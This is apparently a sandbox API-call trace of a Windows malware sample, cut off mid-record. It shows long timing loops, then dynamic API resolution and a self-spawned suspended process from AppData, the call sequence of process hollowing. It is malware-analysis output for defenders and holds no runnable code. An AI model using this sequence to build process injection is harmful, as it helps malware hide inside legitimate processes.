[0109.887] SetLastError (dwErrCode=0x0) [0109.887] GetTickCount () returned 0xf78c7b [0109.887] SetLastError (dwErrCode=0x0) [0109.887] GetTickCount () returned 0xf78c7b [0109.887] SetLastError (dwErrCode=0x0) [0109.887] GetTickCount () returned 0xf78c7b [0109.887] SetLastError (dwErrCode=0x0) [0109.887] GetTickCount () returned 0xf78c7b [0109.887] SetLastError (dwErrCode=0x0) [0109.887] GetTickCount () returned 0xf78c7b [0109.887] SetLastError (dwErrCode=0x0) [0109.887] GetTickCount () returned 0xf78c7b [0109.887] SetLastError (dwErrCode=0x0) [0109.887] GetTickCount () returned 0xf78c7b [0109.887] SetLastError (dwErrCode=0x0) [0109.887] GetTickCount () returned 0xf78c7b [0109.887] SetLastError (dwErrCode=0x0) [0109.887] GetTickCount () returned 0xf78c7b [0109.887] SetLastError (dwErrCode=0x0) [0109.887] GetTickCount () returned 0xf78c7b [0109.887] SetLastError (dwErrCode=0x0) [0109.887] GetTickCount () returned 0xf78c7b [0109.887] SetLastError (dwErrCode=0x0) [0109.887] GetTickCount () returned 0xf78c7b [0109.887] SetLastError (dwErrCode=0x0) [0109.887] GetTickCount () returned 0xf78c7b [0109.888] SetLastError (dwErrCode=0x0) [0109.888] GetTickCount () returned 0xf78c7b [0109.888] SetLastError (dwErrCode=0x0) [0109.888] GetTickCount () returned 0xf78c7b [0109.888] SetLastError (dwErrCode=0x0) [0109.888] GetTickCount () returned 0xf78c7b [0109.888] SetLastError (dwErrCode=0x0) [0109.888] GetTickCount () returned 0xf78c7b [0109.888] SetLastError (dwErrCode=0x0) [0109.888] GetTickCount () returned 0xf78c7b [0109.888] SetLastError (dwErrCode=0x0) [0109.888] GetTickCount () returned 0xf78c7b [0109.888] SetLastError (dwErrCode=0x0) [0109.888] GetTickCount () returned 0xf78c7b [0109.888] SetLastError (dwErrCode=0x0) [0109.888] GetTickCount () returned 0xf78c7b [0109.888] SetLastError (dwErrCode=0x0) [0109.888] GetTickCount () returned 0xf78c7b [0109.888] SetLastError (dwErrCode=0x0) [0109.888] GetTickCount () returned 0xf78c7b [0109.888] SetLastError (dwErrCode=0x0) [0109.945] GetTickCount () returned 0xf78cb9 [0109.946] SetLastError (dwErrCode=0x0) [0109.946] GetTickCount () returned 0xf78cb9 [0109.946] SetLastError (dwErrCode=0x0) [0109.946] GetTickCount () returned 0xf78cb9 [0109.946] SetLastError (dwErrCode=0x0) [0109.946] GetTickCount () returned 0xf78cb9 [0109.946] SetLastError (dwErrCode=0x0) [0109.946] GetTickCount () returned 0xf78cb9 [0109.946] SetLastError (dwErrCode=0x0) [0109.946] GetTickCount () returned 0xf78cb9 [0109.946] SetLastError (dwErrCode=0x0) [0109.946] GetTickCount () returned 0xf78cb9 [0109.946] SetLastError (dwErrCode=0x0) [0109.946] GetTickCount () returned 0xf78cb9 [0109.946] SetLastError (dwErrCode=0x0) [0109.946] GetTickCount () returned 0xf78cb9 [0109.946] SetLastError (dwErrCode=0x0) [0109.946] GetTickCount () returned 0xf78cb9 [0109.946] SetLastError (dwErrCode=0x0) [0109.946] GetTickCount () returned 0xf78cb9 [0109.946] SetLastError (dwErrCode=0x0) [0109.946] GetTickCount () returned 0xf78cb9 [0109.946] SetLastError (dwErrCode=0x0) [0109.946] GetTickCount () returned 0xf78cb9 [0109.946] SetLastError (dwErrCode=0x0) [0109.946] GetTickCount () returned 0xf78cb9 [0109.946] SetLastError (dwErrCode=0x0) [0109.946] GetTickCount () returned 0xf78cb9 [0109.946] SetLastError (dwErrCode=0x0) [0109.946] GetTickCount () returned 0xf78cb9 [0109.946] SetLastError (dwErrCode=0x0) [0109.946] GetTickCount () returned 0xf78cb9 [0109.946] SetLastError (dwErrCode=0x0) [0109.946] GetTickCount () returned 0xf78cb9 [0109.946] SetLastError (dwErrCode=0x0) [0109.946] GetTickCount () returned 0xf78cb9 [0109.946] SetLastError (dwErrCode=0x0) [0109.946] GetTickCount () returned 0xf78cb9 [0109.946] SetLastError (dwErrCode=0x0) [0109.947] GetTickCount () returned 0xf78cb9 [0109.947] SetLastError (dwErrCode=0x0) [0109.947] GetTickCount () returned 0xf78cb9 [0109.947] SetLastError (dwErrCode=0x0) [0109.947] GetTickCount () returned 0xf78cb9 [0109.947] SetLastError (dwErrCode=0x0) [0109.947] GetTickCount () returned 0xf78cb9 [0109.947] SetLastError (dwErrCode=0x0) [0109.947] GetTickCount () returned 0xf78cb9 [0109.947] SetLastError (dwErrCode=0x0) [0109.947] GetTickCount () returned 0xf78cb9 [0109.947] SetLastError (dwErrCode=0x0) [0109.947] GetTickCount () returned 0xf78cb9 [0109.947] SetLastError (dwErrCode=0x0) [0109.947] GetTickCount () returned 0xf78cb9 [0109.947] SetLastError (dwErrCode=0x0) [0109.947] GetTickCount () returned 0xf78cb9 [0109.947] SetLastError (dwErrCode=0x0) [0109.947] GetTickCount () returned 0xf78cb9 [0109.947] SetLastError (dwErrCode=0x0) [0109.947] GetTickCount () returned 0xf78cb9 [0109.947] SetLastError (dwErrCode=0x0) [0109.947] GetTickCount () returned 0xf78cb9 [0109.947] SetLastError (dwErrCode=0x0) [0109.947] GetTickCount () returned 0xf78cb9 [0109.947] SetLastError (dwErrCode=0x0) [0109.947] GetTickCount () returned 0xf78cb9 [0109.947] SetLastError (dwErrCode=0x0) [0109.947] GetTickCount () returned 0xf78cb9 [0109.947] SetLastError (dwErrCode=0x0) [0109.947] GetTickCount () returned 0xf78cb9 [0109.947] SetLastError (dwErrCode=0x0) [0109.947] GetTickCount () returned 0xf78cb9 [0109.947] SetLastError (dwErrCode=0x0) [0109.947] GetTickCount () returned 0xf78cb9 [0109.947] SetLastError (dwErrCode=0x0) [0109.947] GetTickCount () returned 0xf78cb9 [0109.947] SetLastError (dwErrCode=0x0) [0109.947] GetTickCount () returned 0xf78cb9 [0109.948] SetLastError (dwErrCode=0x0) [0109.948] GetTickCount () returned 0xf78cb9 [0109.948] SetLastError (dwErrCode=0x0) [0109.948] GetTickCount () returned 0xf78cb9 [0109.948] SetLastError (dwErrCode=0x0) [0109.948] GetTickCount () returned 0xf78cb9 [0109.948] SetLastError (dwErrCode=0x0) [0109.948] GetTickCount () returned 0xf78cb9 [0109.948] SetLastError (dwErrCode=0x0) [0109.948] GetTickCount () returned 0xf78cb9 [0109.948] SetLastError (dwErrCode=0x0) [0109.948] GetTickCount () returned 0xf78cb9 [0109.948] SetLastError (dwErrCode=0x0) [0109.948] GetTickCount () returned 0xf78cb9 [0109.948] SetLastError (dwErrCode=0x0) [0109.948] GetTickCount () returned 0xf78cb9 [0109.948] SetLastError (dwErrCode=0x0) [0109.948] GetTickCount () returned 0xf78cb9 [0109.948] SetLastError (dwErrCode=0x0) [0109.948] GetTickCount () returned 0xf78cb9 [0109.948] SetLastError (dwErrCode=0x0) [0109.948] GetTickCount () returned 0xf78cb9 [0109.948] SetLastError (dwErrCode=0x0) [0109.948] GetTickCount () returned 0xf78cb9 [0109.948] SetLastError (dwErrCode=0x0) [0109.948] GetTickCount () returned 0xf78cb9 [0109.948] SetLastError (dwErrCode=0x0) [0109.948] GetTickCount () returned 0xf78cb9 [0109.948] SetLastError (dwErrCode=0x0) [0109.948] GetTickCount () returned 0xf78cb9 [0109.948] SetLastError (dwErrCode=0x0) [0109.948] GetTickCount () returned 0xf78cb9 [0109.948] SetLastError (dwErrCode=0x0) [0109.948] GetTickCount () returned 0xf78cb9 [0109.948] SetLastError (dwErrCode=0x0) [0109.948] GetTickCount () returned 0xf78cb9 [0109.948] SetLastError (dwErrCode=0x0) [0109.948] GetTickCount () returned 0xf78cb9 [0109.948] SetLastError (dwErrCode=0x0) [0109.948] GetTickCount () returned 0xf78cb9 [0109.949] SetLastError (dwErrCode=0x0) [0109.949] GetTickCount () returned 0xf78cb9 [0109.949] SetLastError (dwErrCode=0x0) [0109.949] GetTickCount () returned 0xf78cb9 [0109.949] SetLastError (dwErrCode=0x0) [0109.949] GetTickCount () returned 0xf78cb9 [0109.949] SetLastError (dwErrCode=0x0) [0109.949] GetTickCount () returned 0xf78cb9 [0109.949] SetLastError (dwErrCode=0x0) [0109.949] GetTickCount () returned 0xf78cb9 [0109.949] SetLastError (dwErrCode=0x0) [0109.949] GetTickCount () returned 0xf78cb9 [0109.949] SetLastError (dwErrCode=0x0) [0109.949] GetTickCount () returned 0xf78cb9 [0109.949] SetLastError (dwErrCode=0x0) [0109.949] GetTickCount () returned 0xf78cb9 [0109.949] SetLastError (dwErrCode=0x0) [0109.949] GetTickCount () returned 0xf78cb9 [0109.949] SetLastError (dwErrCode=0x0) [0109.949] GetTickCount () returned 0xf78cb9 [0109.949] SetLastError (dwErrCode=0x0) [0109.949] GetTickCount () returned 0xf78cb9 [0109.949] SetLastError (dwErrCode=0x0) [0109.949] GetTickCount () returned 0xf78cb9 [0109.949] SetLastError (dwErrCode=0x0) [0109.949] GetTickCount () returned 0xf78cb9 [0109.949] SetLastError (dwErrCode=0x0) [0109.949] GetTickCount () returned 0xf78cb9 [0109.949] SetLastError (dwErrCode=0x0) [0109.949] GetTickCount () returned 0xf78cb9 [0109.949] SetLastError (dwErrCode=0x0) [0109.949] GetTickCount () returned 0xf78cb9 [0109.949] SetLastError (dwErrCode=0x0) [0109.949] GetTickCount () returned 0xf78cb9 [0109.949] SetLastError (dwErrCode=0x0) [0109.949] GetTickCount () returned 0xf78cb9 [0109.949] SetLastError (dwErrCode=0x0) [0109.949] GetTickCount () returned 0xf78cb9 [0109.949] SetLastError (dwErrCode=0x0) [0109.949] GetTickCount () returned 0xf78cb9 [0109.949] SetLastError (dwErrCode=0x0) [0109.950] GetTickCount () returned 0xf78cb9 [0109.950] SetLastError (dwErrCode=0x0) [0109.950] GetTickCount () returned 0xf78cb9 [0109.950] SetLastError (dwErrCode=0x0) [0109.950] GetTickCount () returned 0xf78cb9 [0109.950] SetLastError (dwErrCode=0x0) [0109.950] GetTickCount () returned 0xf78cb9 [0109.950] SetLastError (dwErrCode=0x0) [0109.950] GetTickCount () returned 0xf78cb9 [0109.950] SetLastError (dwErrCode=0x0) [0109.950] GetTickCount () returned 0xf78cb9 [0109.950] SetLastError (dwErrCode=0x0) [0109.950] GetTickCount () returned 0xf78cb9 [0109.950] SetLastError (dwErrCode=0x0) [0109.950] GetTickCount () returned 0xf78cb9 [0109.950] SetLastError (dwErrCode=0x0) [0109.950] GetTickCount () returned 0xf78cb9 [0109.950] SetLastError (dwErrCode=0x0) [0109.950] GetTickCount () returned 0xf78cb9 [0109.950] SetLastError (dwErrCode=0x0) [0109.950] GetTickCount () returned 0xf78cb9 [0109.950] SetLastError (dwErrCode=0x0) [0109.950] GetTickCount () returned 0xf78cb9 [0109.950] SetLastError (dwErrCode=0x0) [0109.950] GetTickCount () returned 0xf78cb9 [0109.950] SetLastError (dwErrCode=0x0) [0109.950] GetTickCount () returned 0xf78cb9 [0109.950] SetLastError (dwErrCode=0x0) [0109.950] GetTickCount () returned 0xf78cb9 [0109.950] SetLastError (dwErrCode=0x0) [0109.950] GetTickCount () returned 0xf78cb9 [0109.950] SetLastError (dwErrCode=0x0) [0109.950] GetTickCount () returned 0xf78cb9 [0109.950] SetLastError (dwErrCode=0x0) [0109.950] GetTickCount () returned 0xf78cb9 [0109.950] SetLastError (dwErrCode=0x0) [0109.950] GetTickCount () returned 0xf78cc9 [0109.964] SetLastError (dwErrCode=0x0) [0109.964] GetTickCount () returned 0xf78cc9 [0109.964] SetLastError (dwErrCode=0x0) [0109.964] GetTickCount () returned 0xf78cc9 [0109.964] SetLastError (dwErrCode=0x0) [0109.964] GetTickCount () returned 0xf78cc9 [0109.964] SetLastError (dwErrCode=0x0) [0109.964] GetTickCount () returned 0xf78cc9 [0109.964] SetLastError (dwErrCode=0x0) [0109.964] GetTickCount () returned 0xf78cc9 [0109.964] SetLastError (dwErrCode=0x0) [0109.964] GetTickCount () returned 0xf78cc9 [0109.964] SetLastError (dwErrCode=0x0) [0109.964] GetTickCount () returned 0xf78cc9 [0109.964] SetLastError (dwErrCode=0x0) [0109.964] GetTickCount () returned 0xf78cc9 [0109.964] SetLastError (dwErrCode=0x0) [0109.964] GetTickCount () returned 0xf78cc9 [0109.964] SetLastError (dwErrCode=0x0) [0109.964] GetTickCount () returned 0xf78cc9 [0109.964] SetLastError (dwErrCode=0x0) [0109.964] GetTickCount () returned 0xf78cc9 [0109.964] SetLastError (dwErrCode=0x0) [0109.964] GetTickCount () returned 0xf78cc9 [0109.964] SetLastError (dwErrCode=0x0) [0109.964] GetTickCount () returned 0xf78cc9 [0109.964] SetLastError (dwErrCode=0x0) [0109.965] GetTickCount () returned 0xf78cc9 [0109.965] SetLastError (dwErrCode=0x0) [0109.965] GetTickCount () returned 0xf78cc9 [0109.965] SetLastError (dwErrCode=0x0) [0109.965] GetTickCount () returned 0xf78cc9 [0109.965] SetLastError (dwErrCode=0x0) [0109.965] GetTickCount () returned 0xf78cc9 [0109.965] SetLastError (dwErrCode=0x0) [0109.965] GetTickCount () returned 0xf78cc9 [0109.965] SetLastError (dwErrCode=0x0) [0109.965] GetTickCount () returned 0xf78cc9 [0109.965] SetLastError (dwErrCode=0x0) [0109.965] GetTickCount () returned 0xf78cc9 [0109.965] SetLastError (dwErrCode=0x0) [0109.965] GetTickCount () returned 0xf78cc9 [0109.965] SetLastError (dwErrCode=0x0) [0109.965] GetTickCount () returned 0xf78cc9 [0109.965] SetLastError (dwErrCode=0x0) [0109.965] GetTickCount () returned 0xf78cc9 [0109.965] SetLastError (dwErrCode=0x0) [0109.965] GetTickCount () returned 0xf78cc9 [0109.965] SetLastError (dwErrCode=0x0) [0109.965] GetTickCount () returned 0xf78cc9 [0109.965] SetLastError (dwErrCode=0x0) [0109.965] GetTickCount () returned 0xf78cc9 [0109.965] SetLastError (dwErrCode=0x0) [0109.965] GetTickCount () returned 0xf78cc9 [0109.965] SetLastError (dwErrCode=0x0) [0109.965] GetTickCount () returned 0xf78cc9 [0109.965] SetLastError (dwErrCode=0x0) [0109.965] GetTickCount () returned 0xf78cc9 [0109.965] SetLastError (dwErrCode=0x0) [0109.965] GetTickCount () returned 0xf78cc9 [0109.966] SetLastError (dwErrCode=0x0) [0109.966] GetTickCount () returned 0xf78cc9 [0109.966] SetLastError (dwErrCode=0x0) [0109.966] GetTickCount () returned 0xf78cc9 [0109.966] SetLastError (dwErrCode=0x0) [0109.966] GetTickCount () returned 0xf78cc9 [0109.966] SetLastError (dwErrCode=0x0) [0109.966] GetTickCount () returned 0xf78cc9 [0109.966] SetLastError (dwErrCode=0x0) [0109.966] GetTickCount () returned 0xf78cc9 [0109.966] SetLastError (dwErrCode=0x0) [0109.966] GetTickCount () returned 0xf78cc9 [0109.966] SetLastError (dwErrCode=0x0) [0109.966] GetTickCount () returned 0xf78cc9 [0109.966] SetLastError (dwErrCode=0x0) [0109.966] GetTickCount () returned 0xf78cd8 [0109.966] SetLastError (dwErrCode=0x0) [0109.966] GetTickCount () returned 0xf78cd8 [0109.966] SetLastError (dwErrCode=0x0) [0109.966] GetTickCount () returned 0xf78cd8 [0109.966] SetLastError (dwErrCode=0x0) [0109.966] GetTickCount () returned 0xf78cd8 [0109.967] SetLastError (dwErrCode=0x0) [0109.967] GetTickCount () returned 0xf78cd8 [0109.967] SetLastError (dwErrCode=0x0) [0109.967] GetTickCount () returned 0xf78cd8 [0109.967] SetLastError (dwErrCode=0x0) [0109.967] GetTickCount () returned 0xf78cd8 [0109.967] SetLastError (dwErrCode=0x0) [0109.967] GetTickCount () returned 0xf78cd8 [0109.967] SetLastError (dwErrCode=0x0) [0110.003] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x769b0000 [0110.004] GetProcAddress (hModule=0x769b0000, lpProcName="GlobalAlloc") returned 0x769c5846 [0110.004] GetProcAddress (hModule=0x769b0000, lpProcName="GetLastError") returned 0x769c11c0 [0110.004] GetProcAddress (hModule=0x769b0000, lpProcName="Sleep") returned 0x769c10ff [0110.004] GetProcAddress (hModule=0x769b0000, lpProcName="VirtualAlloc") returned 0x769c1836 [0110.004] GetProcAddress (hModule=0x769b0000, lpProcName="CreateToolhelp32Snapshot") returned 0x769e7327 [0110.004] GetProcAddress (hModule=0x769b0000, lpProcName="Module32First") returned 0x76a46279 [0110.004] GetProcAddress (hModule=0x769b0000, lpProcName="CloseHandle") returned 0x769c13f0 [0110.004] CreateToolhelp32Snapshot (dwFlags=0x8, th32ProcessID=0x0) returned 0x30 [0110.006] Module32First (hSnapshot=0x30, lpme=0x18c410) returned 1 [0110.006] VirtualAlloc (lpAddress=0x0, dwSize=0x89a0, flAllocationType=0x1000, flProtect=0x40) returned 0x20000 [0110.007] LoadLibraryA (lpLibFileName="user32") returned 0x773b0000 [0110.108] GetProcAddress (hModule=0x773b0000, lpProcName="MessageBoxA") returned 0x7741fd1e [0110.108] GetProcAddress (hModule=0x773b0000, lpProcName="GetMessageExtraInfo") returned 0x773eed76 [0110.108] LoadLibraryA (lpLibFileName="kernel32") returned 0x769b0000 [0110.108] GetProcAddress (hModule=0x769b0000, lpProcName="WinExec") returned 0x76a43051 [0110.108] GetProcAddress (hModule=0x769b0000, lpProcName="CreateFileA") returned 0x769c537e [0110.108] GetProcAddress (hModule=0x769b0000, lpProcName="WriteFile") returned 0x769c1282 [0110.108] GetProcAddress (hModule=0x769b0000, lpProcName="CloseHandle") returned 0x769c13f0 [0110.108] GetProcAddress (hModule=0x769b0000, lpProcName="CreateProcessA") returned 0x769c1072 [0110.108] GetProcAddress (hModule=0x769b0000, lpProcName="GetThreadContext") returned 0x769e799c [0110.108] GetProcAddress (hModule=0x769b0000, lpProcName="VirtualAlloc") returned 0x769c1836 [0110.108] GetProcAddress (hModule=0x769b0000, lpProcName="VirtualAllocEx") returned 0x769dd980 [0110.109] GetProcAddress (hModule=0x769b0000, lpProcName="VirtualFree") returned 0x769c184e [0110.109] GetProcAddress (hModule=0x769b0000, lpProcName="ReadProcessMemory") returned 0x769dcfa4 [0110.109] GetProcAddress (hModule=0x769b0000, lpProcName="WriteProcessMemory") returned 0x769dd9b0 [0110.109] GetProcAddress (hModule=0x769b0000, lpProcName="SetThreadContext") returned 0x76a45933 [0110.109] GetProcAddress (hModule=0x769b0000, lpProcName="ResumeThread") returned 0x769c43a7 [0110.109] GetProcAddress (hModule=0x769b0000, lpProcName="WaitForSingleObject") returned 0x769c1136 [0110.109] GetProcAddress (hModule=0x769b0000, lpProcName="GetModuleFileNameA") returned 0x769c1491 [0110.109] GetProcAddress (hModule=0x769b0000, lpProcName="GetCommandLineA") returned 0x769c5159 [0110.109] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x779e0000 [0110.109] GetProcAddress (hModule=0x779e0000, lpProcName="NtUnmapViewOfSection") returned 0x779ffc70 [0110.109] GetProcAddress (hModule=0x779e0000, lpProcName="NtWriteVirtualMemory") returned 0x779ffe04 [0110.110] GetProcAddress (hModule=0x773b0000, lpProcName="RegisterClassExA") returned 0x773cdb98 [0110.110] GetProcAddress (hModule=0x773b0000, lpProcName="CreateWindowExA") returned 0x773cd22e [0110.110] GetProcAddress (hModule=0x773b0000, lpProcName="PostMessageA") returned 0x773d3baa [0110.110] GetProcAddress (hModule=0x773b0000, lpProcName="GetMessageA") returned 0x773c7bd3 [0110.110] GetProcAddress (hModule=0x773b0000, lpProcName="DefWindowProcA") returned 0x77a224e0 [0110.110] GetProcAddress (hModule=0x769b0000, lpProcName="GetFileAttributesA") returned 0x769c53cc [0110.110] GetProcAddress (hModule=0x769b0000, lpProcName="GetStartupInfoA") returned 0x769c0e00 [0110.110] GetProcAddress (hModule=0x769b0000, lpProcName="VirtualProtectEx") returned 0x76a44b5f [0110.110] GetProcAddress (hModule=0x769b0000, lpProcName="ExitProcess") returned 0x769c79c8 [0110.110] GetFileAttributesA (lpFileName="apfHQ" (normalized: "c:\\windows\\syswow64\\apfhq")) returned 0xffffffff [0110.111] GetFileAttributesA (lpFileName="apfHQ" (normalized: "c:\\windows\\syswow64\\apfhq")) returned 0xffffffff [0110.111] GetFileAttributesA (lpFileName="apfHQ" (normalized: "c:\\windows\\syswow64\\apfhq")) returned 0xffffffff [0110.111] RegisterClassExA (param_1=0x18c0cc) returned 0x34c1b9 [0110.111] CreateWindowExA (dwExStyle=0x200, lpClassName="saodkfnosa9uin", lpWindowName="mfoaskdfnoa", dwStyle=0xcf0000, X=-2147483648, Y=-2147483648, nWidth=1000, nHeight=1000, hWndParent=0x0, hMenu=0x0, hInstance=0x0, lpParam=0x0) returned 0x800cc [0110.123] PostMessageA (hWnd=0x800cc, Msg=0x400, wParam=0x64, lParam=0x1f4) returned 1 [0110.123] GetMessageA (in: lpMsg=0x18c0fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18c0fc) returned 1 [0110.123] VirtualAlloc (lpAddress=0x0, dwSize=0x2800, flAllocationType=0x1000, flProtect=0x4) returned 0x2a0000 [0110.123] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x2a0000, nSize=0x2800 | out: lpFilename="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\cdieedr" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\cdieedr")) returned 0x2a [0110.124] GetStartupInfoA (in: lpStartupInfo=0x18c020 | out: lpStartupInfo=0x18c020*(cb=0x44, lpReserved="", lpDesktop="winsta0\\default", lpTitle="taskeng.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x81, wShowWindow=0x4, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffff, hStdOutput=0xffffffff, hStdError=0xffffffff)) [0110.124] GetCommandLineA () returned="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\cdieedr " [0110.124] CreateProcessA (in: lpApplicationName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\cdieedr", lpCommandLine="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\cdieedr ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x8000004, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x18c020*(cb=0x44, lpReserved="", lpDesktop="winsta0\\default", lpTitle="taskeng.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x81, wShowWindow=0x4, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffff, hStdOutput=0xffffffff, hStdError=0xffffffff), lpProcessInformation=0x18c078 | out: lpCommandLine="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\cdieedr ", lpProcessInformation=0x18c078*(hProcess=0x78, hThread=0x74, dwProcessId=0xe80, dwThreadId=0xe84)) returned 1 [0110.131] VirtualFree (lpAddress=0x2a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0110.132] VirtualAlloc (lpAddress=0x0, dwSize=0x4, flAllocationType=0x1000, flProtect=0x4) returned 0x2a0000 [0110.132] GetThreadContext (in: hThread=0x74, lpContext=0x2a0000 | out: lpContext=0x2a0000*(ContextFlags=0x10007, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x2b, SegFs=0x53, SegEs=0x2b, SegDs=0x2b, Edi=0x0, Esi=0x0, Ebx=0x7efde000, Edx=0x0, Ecx=0x0, Eax=0x424a10, Ebp=0x0, Eip=0x779f01c4, SegCs=0x23, EFlags=0x202, Esp=0x18fff0, SegSs=0x2b, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, 